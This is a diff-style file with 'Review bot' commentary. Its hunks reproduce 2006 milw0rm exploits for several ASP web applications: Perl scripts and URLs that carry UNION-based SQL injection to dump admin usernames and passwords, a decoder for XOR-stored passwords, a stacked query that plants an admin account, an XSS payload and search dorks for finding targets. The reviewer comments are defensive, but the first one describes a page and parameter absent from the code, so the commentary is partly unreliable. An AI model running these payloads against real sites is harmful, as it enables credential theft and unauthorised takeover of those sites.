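Review bot: the request assembled in this hunk carries a fixed fingerprint, `User-Agent: NukeZilla 4.3`, `Accept-Language: tr` and a `Referer` set to the target's own host, and it terminates header lines with bare `\n` rather than CRLF, all of which are cheap signatures for web-server log review. The vulnerable input is `fldGalleryID` on `template_gallery_detail.asp`, where `$bpxp` is concatenated straight into the URL the application passes to its query; since the identifier is numeric, the fix is a parameterised query or at minimum an integer cast before use. As in the other scripts in this commit, the `number of columns` branch shows verbose database errors reaching the client, which should be suppressed independently of the injection fix.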


@ -1,87 +1,87 @@
#!/usr/bin/perl #!/usr/bin/perl
#Method found & Exploit scripted by nukedx #Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=21 #Original advisory: http://www.nukedx.com/?viewdoc=21
#Usage: aspp.pl <host> <path> <user> #Usage: aspp.pl <host> <path> <user>
use IO::Socket; use IO::Socket;
use Math::BigInt; use Math::BigInt;
if(@ARGV != 3) { usage(); } if(@ARGV != 3) { usage(); }
else { exploit(); } else { exploit(); }
sub header() sub header()
{ {
print "\n- NukedX Security Advisory Nr.2006-21\r\n"; print "\n- NukedX Security Advisory Nr.2006-21\r\n";
print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n"; print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n";
} }
sub usage() sub usage()
{ {
header(); header();
print "- Usage: $0 <host> <path> <user>\r\n"; print "- Usage: $0 <host> <path> <user>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n"; print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to ASPPortal ex: /portal/\r\n"; print "- <path> -> Path to ASPPortal ex: /portal/\r\n";
print "- <user> -> Username that you want password. ex: admin\r\n"; print "- <user> -> Username that you want password. ex: admin\r\n";
exit(); exit();
} }
sub decrypt () sub decrypt ()
{ {
$lp = length($appass); $lp = length($appass);
$apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBXPA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<\$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V"; $apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBXPA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<\$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V";
if ($lp == 0) { die("- An error occurued\r\n"); } if ($lp == 0) { die("- An error occurued\r\n"); }
for ($i = 0; $i < $lp ; $i++) { for ($i = 0; $i < $lp ; $i++) {
$f = $lp - $i - 1; # Formula for getting character via substr... $f = $lp - $i - 1; # Formula for getting character via substr...
$n = substr($apkey,$f,1); $n = substr($apkey,$f,1);
$l = substr($appass,$f,1); $l = substr($appass,$f,1);
$appwd = chr(ord($n)^ord($l)).$appwd; $appwd = chr(ord($n)^ord($l)).$appwd;
} }
print "- Password decrypted as: $appwd\r\n"; print "- Password decrypted as: $appwd\r\n";
print "- Lets go $aphost$apdir$apfinal for login\r\n"; print "- Lets go $aphost$apdir$apfinal for login\r\n";
exit(); exit();
} }
sub exploit () sub exploit ()
{ {
#Our variables... #Our variables...
$apserver = $ARGV[0]; $apserver = $ARGV[0];
$apserver =~ s/(http:\/\/)//eg; $apserver =~ s/(http:\/\/)//eg;
$aphost = "http://".$apserver; $aphost = "http://".$apserver;
$apdir = $ARGV[1]; $apdir = $ARGV[1];
$apport = "80"; $apport = "80";
$aptar = "content/downloads/download_click.asp?downloadid="; $aptar = "content/downloads/download_click.asp?downloadid=";
$apfinal = "content/users/login.asp"; $apfinal = "content/users/login.asp";
$apxp = "-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='$ARGV[2]'"; $apxp = "-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='$ARGV[2]'";
$apreq = $aphost.$apdir.$aptar.$apxp; $apreq = $aphost.$apdir.$aptar.$apxp;
#Sending data... #Sending data...
header(); header();
print "- Trying to connect: $apserver\r\n"; print "- Trying to connect: $apserver\r\n";
$ap = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n"; $ap = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n";
print $ap "GET $apreq HTTP/1.1\n"; print $ap "GET $apreq HTTP/1.1\n";
print $ap "Accept: */*\n"; print $ap "Accept: */*\n";
print $ap "Referer: $aphost\n"; print $ap "Referer: $aphost\n";
print $ap "Accept-Language: tr\n"; print $ap "Accept-Language: tr\n";
print $ap "User-Agent: NukeZilla\n"; print $ap "User-Agent: NukeZilla\n";
print $ap "Cache-Control: no-cache\n"; print $ap "Cache-Control: no-cache\n";
print $ap "Host: $apserver\n"; print $ap "Host: $apserver\n";
print $ap "Connection: close\n\n"; print $ap "Connection: close\n\n";
print "- Connected...\r\n"; print "- Connected...\r\n";
while ($answer = <$ap>) { while ($answer = <$ap>) {
if ($answer =~ /string: &quot;(.*?)&quot;]'/) { if ($answer =~ /string: &quot;(.*?)&quot;]'/) {
print "- Exploit succeed! Getting $ARGV[2]'s information\r\n"; print "- Exploit succeed! Getting $ARGV[2]'s information\r\n";
print "- Username: $ARGV[2]\r\n"; print "- Username: $ARGV[2]\r\n";
print "- Decrypting password....\r\n"; print "- Decrypting password....\r\n";
$appass = $1; $appass = $1;
$appass =~ s/(&quot;)/chr(34)/eg; $appass =~ s/(&quot;)/chr(34)/eg;
$appass =~ s/(&lt;)/chr(60)/eg; $appass =~ s/(&lt;)/chr(60)/eg;
$appass =~ s/(&gt;)/chr(62)/eg; $appass =~ s/(&gt;)/chr(62)/eg;
$appass =~ s/(&nbsp;)/chr(32)/eg; $appass =~ s/(&nbsp;)/chr(32)/eg;
decrypt(); decrypt();
} }
if ($answer =~ /number of columns/) { if ($answer =~ /number of columns/) {
print "- This version of ASPPortal is vulnerable too\r\n"; print "- This version of ASPPortal is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n"; print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n"; print "- So please edit query by manually adding null data..\r\n";
exit(); exit();
} }
} }
#Exploit failed... #Exploit failed...
print "- Exploit failed\n" print "- Exploit failed\n"
} }
# milw0rm.com [2006-03-20] # milw0rm.com [2006-03-20]
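Review bot: `decrypt()` in this hunk shows that ASPPortal's stored password is a per-character XOR of the plaintext against the fixed key string in `$apkey` (`chr(ord($n)^ord($l))`), so anyone holding a copy of the application holds the key and the "encryption" is a reversible encoding, not protection; stored credentials need a salted, slow password hash, and the fix is not complete until existing values are re-hashed on next login. The `string: &quot;(.*?)&quot;]'` match and the four `&quot;`/`&lt;`/`&gt;`/`&nbsp;` un-escaping lines also show the raw query result being echoed inside a database error message on `content/downloads/download_click.asp?downloadid=`, so both the `downloadid` parameter (numeric, should be cast or bound) and the interpolated `username='$ARGV[2]'` string need parameterisation, and detailed errors should be logged rather than rendered.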


@ -1,69 +1,69 @@
#!/usr/bin/perl #!/usr/bin/perl
#Method found & Exploit scripted by nukedx #Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=22 #Original advisory: http://www.nukedx.com/?viewdoc=22
#Usage: ezasp.pl <host> <path> #Usage: ezasp.pl <host> <path>
#googledork: [ "Powered By EzASPSite v2.0 RC3" ] 62.400 Pages.. #googledork: [ "Powered By EzASPSite v2.0 RC3" ] 62.400 Pages..
use IO::Socket; use IO::Socket;
if(@ARGV != 2) { usage(); } if(@ARGV != 2) { usage(); }
else { exploit(); } else { exploit(); }
sub header() sub header()
{ {
print "\n- NukedX Security Advisory Nr.2006-22\r\n"; print "\n- NukedX Security Advisory Nr.2006-22\r\n";
print "- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit\r\n"; print "- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit\r\n";
} }
sub usage() sub usage()
{ {
header(); header();
print "- Usage: $0 <host> <path>\r\n"; print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n"; print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to EzASPSite ex: /ezasp/\r\n"; print "- <path> -> Path to EzASPSite ex: /ezasp/\r\n";
exit(); exit();
} }
sub exploit () sub exploit ()
{ {
#Our variables... #Our variables...
$ezserver = $ARGV[0]; $ezserver = $ARGV[0];
$ezserver =~ s/(http:\/\/)//eg; $ezserver =~ s/(http:\/\/)//eg;
$ezhost = "http://".$ezserver; $ezhost = "http://".$ezserver;
$ezdir = $ARGV[1]; $ezdir = $ARGV[1];
$ezport = "80"; $ezport = "80";
$eztar = "Default.asp?Scheme="; $eztar = "Default.asp?Scheme=";
$ezxp = "-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1"; $ezxp = "-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1";
$ezreq = $ezhost.$ezdir.$eztar.$ezxp; $ezreq = $ezhost.$ezdir.$eztar.$ezxp;
#Sending data... #Sending data...
header(); header();
print "- Trying to connect: $ezserver\r\n"; print "- Trying to connect: $ezserver\r\n";
$ez = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ezserver", PeerPort => "$ezport") || die "- Connection failed...\n"; $ez = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ezserver", PeerPort => "$ezport") || die "- Connection failed...\n";
print $ez "GET $ezreq HTTP/1.1\n"; print $ez "GET $ezreq HTTP/1.1\n";
print $ez "Accept: */*\n"; print $ez "Accept: */*\n";
print $ez "Referer: $ezhost\n"; print $ez "Referer: $ezhost\n";
print $ez "Accept-Language: tr\n"; print $ez "Accept-Language: tr\n";
print $ez "User-Agent: NukeZilla\n"; print $ez "User-Agent: NukeZilla\n";
print $ez "Cache-Control: no-cache\n"; print $ez "Cache-Control: no-cache\n";
print $ez "Host: $ezserver\n"; print $ez "Host: $ezserver\n";
print $ez "Connection: close\n\n"; print $ez "Connection: close\n\n";
print "- Connected...\r\n"; print "- Connected...\r\n";
while ($answer = <$ez>) { while ($answer = <$ez>) {
if ($answer =~ /<link href=\"forum\/(.*?)\" rel=\"stylesheet\"/) { if ($answer =~ /<link href=\"forum\/(.*?)\" rel=\"stylesheet\"/) {
print "- Exploit succeed! Getting admin's information\r\n"; print "- Exploit succeed! Getting admin's information\r\n";
print "- USERNAME: $1\r\n"; print "- USERNAME: $1\r\n";
} }
if ($answer =~ /bgcolor=\"NWPX\" background=\"forum\/(.*?)\">/) { if ($answer =~ /bgcolor=\"NWPX\" background=\"forum\/(.*?)\">/) {
print "- SHA1 HASH of PASSWORD: $1\r\n"; print "- SHA1 HASH of PASSWORD: $1\r\n";
exit(); exit();
} }
if ($answer =~ /number of columns/) { if ($answer =~ /number of columns/) {
print "- This version of EzASPSite is vulnerable too\r\n"; print "- This version of EzASPSite is vulnerable too\r\n";
print "- but default query of SQL-Inj. does not work on it\r\n"; print "- but default query of SQL-Inj. does not work on it\r\n";
print "- So please edit query by manually adding null data..\r\n"; print "- So please edit query by manually adding null data..\r\n";
exit(); exit();
} }
} }
#Exploit failed... #Exploit failed...
print "- Exploit failed\n" print "- Exploit failed\n"
} }
# nukedx.com [2006-03-29] # nukedx.com [2006-03-29]
# milw0rm.com [2006-03-29] # milw0rm.com [2006-03-29]
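Review bot: the `Scheme` parameter of `Default.asp` in this hunk is used directly in a wide SELECT (the UNION in `$ezxp` has to supply 78 columns), and the script locates its output by injecting the constant `'NWPX'` and then matching `bgcolor=\"NWPX\" background=\"forum\/...\"` in the response, which means the query result is written into stylesheet and attribute positions of the page; the fix is to resolve `Scheme` against a server-side allow-list of known scheme IDs rather than interpolating it. The output is labelled `SHA1 HASH of PASSWORD`, so a successful read yields an unsalted SHA1, which is brute-forceable offline; password storage should move to a salted, slow hash. The literal `NWPX` appearing as a bgcolor value, or `UNION SELECT` in the `Scheme` query parameter, are straightforward detection signatures.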


@ -1,77 +1,77 @@
#!/usr/bin/perl #!/usr/bin/perl
#Method found & Exploit scripted by nukedx #Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=23 #Original advisory: http://www.nukedx.com/?viewdoc=23
#Usage: aspsi.pl <host> <path> <userid> #Usage: aspsi.pl <host> <path> <userid>
use IO::Socket; use IO::Socket;
if(@ARGV != 3) { usage(); } if(@ARGV != 3) { usage(); }
else { exploit(); } else { exploit(); }
sub header() sub header()
{ {
print "\n- NukedX Security Advisory Nr.2006-23\r\n"; print "\n- NukedX Security Advisory Nr.2006-23\r\n";
print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n"; print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n";
} }
sub usage() sub usage()
{ {
header(); header();
print "- Usage: $0 <host> <path>\r\n"; print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n"; print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to ASPSitem ex: /aspsitem/\r\n"; print "- <path> -> Path to ASPSitem ex: /aspsitem/\r\n";
print "- <userid> -> ID of user that you want info ex: 1\r\n"; print "- <userid> -> ID of user that you want info ex: 1\r\n";
exit(); exit();
} }
sub exploit () sub exploit ()
{ {
#Our variables... #Our variables...
$asserver = $ARGV[0]; $asserver = $ARGV[0];
$asserver =~ s/(http:\/\/)//eg; $asserver =~ s/(http:\/\/)//eg;
$ashost = "http://".$asserver; $ashost = "http://".$asserver;
$asdir = $ARGV[1]; $asdir = $ARGV[1];
$asport = "80"; $asport = "80";
$astar = "Haberler.asp?haber=devam&id="; $astar = "Haberler.asp?haber=devam&id=";
$asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2]; $asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2];
$asreq = $ashost.$asdir.$astar.$asxp; $asreq = $ashost.$asdir.$astar.$asxp;
#Sending data... #Sending data...
header(); header();
print "- Trying to connect: $asserver\r\n"; print "- Trying to connect: $asserver\r\n";
$as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n"; $as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n";
print $as "GET $asreq HTTP/1.1\n"; print $as "GET $asreq HTTP/1.1\n";
print $as "Accept: */*\n"; print $as "Accept: */*\n";
print $as "Referer: $ashost\n"; print $as "Referer: $ashost\n";
print $as "Accept-Language: tr\n"; print $as "Accept-Language: tr\n";
print $as "User-Agent: NukeZilla\n"; print $as "User-Agent: NukeZilla\n";
print $as "Cache-Control: no-cache\n"; print $as "Cache-Control: no-cache\n";
print $as "Host: $asserver\n"; print $as "Host: $asserver\n";
print $as "Connection: close\n\n"; print $as "Connection: close\n\n";
print "- Connected...\r\n"; print "- Connected...\r\n";
while ($answer = <$as>) { while ($answer = <$as>) {
if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) { if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) {
if ($1 == $ARGV[2]) { if ($1 == $ARGV[2]) {
print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n"; print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n";
} }
else { die "- Exploit failed\n"; } else { die "- Exploit failed\n"; }
} }
if ($answer =~ /\" align=\"left\">(.*?)</) { if ($answer =~ /\" align=\"left\">(.*?)</) {
print "- Username: $1\r\n"; print "- Username: $1\r\n";
} }
if ($answer =~ /Ekleyen&nbsp;&nbsp;\(<b>(.*?)<\/b>\)/) { if ($answer =~ /Ekleyen&nbsp;&nbsp;\(<b>(.*?)<\/b>\)/) {
print "- MD5 HASH of PASSWORD: $1\r\n"; print "- MD5 HASH of PASSWORD: $1\r\n";
} }
if ($answer =~ /\| (.*?) ]<br>/) { if ($answer =~ /\| (.*?) ]<br>/) {
print "- Regdate: $1\r\n"; print "- Regdate: $1\r\n";
} }
if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) { if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) {
print "- Email: $1\r\n"; print "- Email: $1\r\n";
} }
if ($answer =~ / Okunma : (.*?) /) { if ($answer =~ / Okunma : (.*?) /) {
print "- MD5 hash of answer: $1\r\n"; print "- MD5 hash of answer: $1\r\n";
exit(); exit();
} }
} }
#Exploit failed... #Exploit failed...
print "- Exploit failed\n" print "- Exploit failed\n"
} }
#nukedx.com [2006-04-19] #nukedx.com [2006-04-19]
# milw0rm.com [2006-04-19] # milw0rm.com [2006-04-19]
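Review bot: the `usage()` text in this hunk documents only `<host> <path>` while the argument check `if(@ARGV != 3)` and the header comment `#Usage: aspsi.pl <host> <path> <userid>` require a third argument, so the help output is out of step with the code. On the application side, `Haberler.asp?haber=devam&id=` interpolates `id` into a query that the script redirects at the `uyeler` (members) table, pulling `kulladi`, `sifre`, `email`, `kayittarih` and `cevap` into the news template's username, added-by, comments-link and read-count slots; the numeric `id` should be bound or integer-cast, and since the script labels both `sifre` and `cevap` as MD5 hashes, the password and secret-question answer are stored with unsalted MD5 and should be migrated to a salted, slow hash.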


@ -1,18 +1,18 @@
# BK Forum <= 4.0 Remote SQL Injection # BK Forum <= 4.0 Remote SQL Injection
# by n0m3rcy # by n0m3rcy
# Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org> # Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org>
# Exploit: # Exploit:
First you must be logged in First you must be logged in
Then type this in your browser Then type this in your browser
http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1 http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
You will find admin's password You will find admin's password
# Shoutz: # Shoutz:
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00 nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00
# Have phun! # Have phun!
# milw0rm.com [2006-04-24] # milw0rm.com [2006-04-24]
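Review bot: the `First you must be logged in` precondition in this hunk means the `member.asp?id=` injection is reachable only from an authenticated session, so authentication is not a mitigation here and detection rules must not exempt logged-in traffic; `UNION SELECT` against a numeric `id` parameter is the signature to alert on regardless of session state. The fix is a parameterised query (or integer cast) on `id`, and since the PoC reads `memPassword` directly, the stored password should also be hashed rather than kept in recoverable form.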


@ -1,30 +1,30 @@
VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com) VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com)
people claimed there is some underground sploit for vp-asp 6.00 and I was sure that people claimed there is some underground sploit for vp-asp 6.00 and I was sure that
if a sploit really exist in the ug i can find the bug and make a small hack for it ^^ if a sploit really exist in the ug i can find the bug and make a small hack for it ^^
well it didn't take me more then 5 minutes to find a bug in vp-asp. well it didn't take me more then 5 minutes to find a bug in vp-asp.
* the vendor was already notified. * the vendor was already notified.
p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions
taken by people using the information in this document, if you don't agree please stop reading taken by people using the information in this document, if you don't agree please stop reading
and close this text document asap. and close this text document asap.
* this information is for educational purposes only! * this information is for educational purposes only!
---- ----
The SQL Injection bug is in the shopcurrency.asp file under the "cid" query. The SQL Injection bug is in the shopcurrency.asp file under the "cid" query.
quick hack to add user a/a: quick hack to add user a/a:
/shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')-- /shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--
and for those of you that don't know sql at all and for those of you that don't know sql at all
this is how you remove the user 'a': this is how you remove the user 'a':
/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'-- /shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--
-tracewar -tracewar
# milw0rm.com [2006-05-06] # milw0rm.com [2006-05-06]
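Review bot: the two `shopcurrency.asp?cid=AUD';insert into tbluser ... --` and `...;delete from tbluser ... --` lines in this hunk show stacked queries executing, so the database connection allows multiple statements per call and the web application's account has INSERT and DELETE on `tbluser` from a currency-lookup page; beyond parameterising `cid`, this is a least-privilege finding: the account used by storefront pages should not be able to write the user table at all, and the driver should not permit statement stacking where it can be disabled. For detection, a new `tbluser` row whose `fldaccess` lists every permission ID and was not created through the admin UI, or a `;` followed by `insert`/`delete` in the `cid` parameter, are both worth alerting on.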


@ -1,21 +1,21 @@
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
Vulnerability: Vulnerability:
-------------------- --------------------
SQL_Injection: SQL_Injection:
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query. Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation extracts username and password of administrator in clear text . Successful exploitation extracts username and password of administrator in clear text .
Proof of Concepts: Proof of Concepts:
-------------------- --------------------
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1' site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1' site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
------- -------
By FarhadKey On 19 May 2006 By FarhadKey On 19 May 2006
# milw0rm.com [2006-05-19] # milw0rm.com [2006-05-19]
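Review bot: the advisory text in this hunk names `settings.asp` as the page taking the `layid` parameter, but both proof-of-concept URLs target `login.asp` and `main.asp`, so either the description is incomplete or the parameter is consumed by a shared include; a reviewer should have the author reconcile the two before the entry is filed, since defenders patching by filename will otherwise miss the affected pages. The description also states that the administrator credentials in `adminLogins` (`J_User`, `J_Pass`) come back in clear text, so the fix is two-fold: bind `layid` as a parameter wherever it is read, and hash the stored password.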


@ -1,11 +1,11 @@
# Title : qjForum(member.asp) SQL Injection Vulnerability # Title : qjForum(member.asp) SQL Injection Vulnerability
# Author : ajann # Author : ajann
# greetz : Nukedx,TheHacker # greetz : Nukedx,TheHacker
# Dork : "qjForum" # Dork : "qjForum"
# Exploit: # Exploit:
# Login before injection. # Login before injection.
### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member ### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member
# milw0rm.com [2006-05-26] # milw0rm.com [2006-05-26]

@ -1,49 +1,49 @@
ENGLISH ENGLISH
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities # Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork : "Copyright 2004 easy-content forums" # Dork : "Copyright 2004 easy-content forums"
# Author : ajann # Author : ajann
# Exploit; # Exploit;
SQL INJECT.ON-------------------------------------------------------- SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL TEXT ### http://[target]/[path]/userview.asp?startletter=SQL TEXT
### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x ### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x
Example: Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS-------------------------------------------------------- XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=xss TEXT ### http://[target]/[path]/userview.asp?startletter=xss TEXT
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT ### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT
Example: Example:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X
TURKISH TURKISH
# Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities # Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Sözcük[Arama] : "powered by phpmydirectory" # Sözcük[Arama] : "powered by phpmydirectory"
# Aç... Bulan : ajann # Aç... Bulan : ajann
# Aç.k bulunan dosyalar; # Aç.k bulunan dosyalar;
SQL INJECT.ON-------------------------------------------------------- SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ ### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken ### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken
Örnek: Örnek:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS-------------------------------------------------------- XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ ### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ ### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ
Örnek: Örnek:
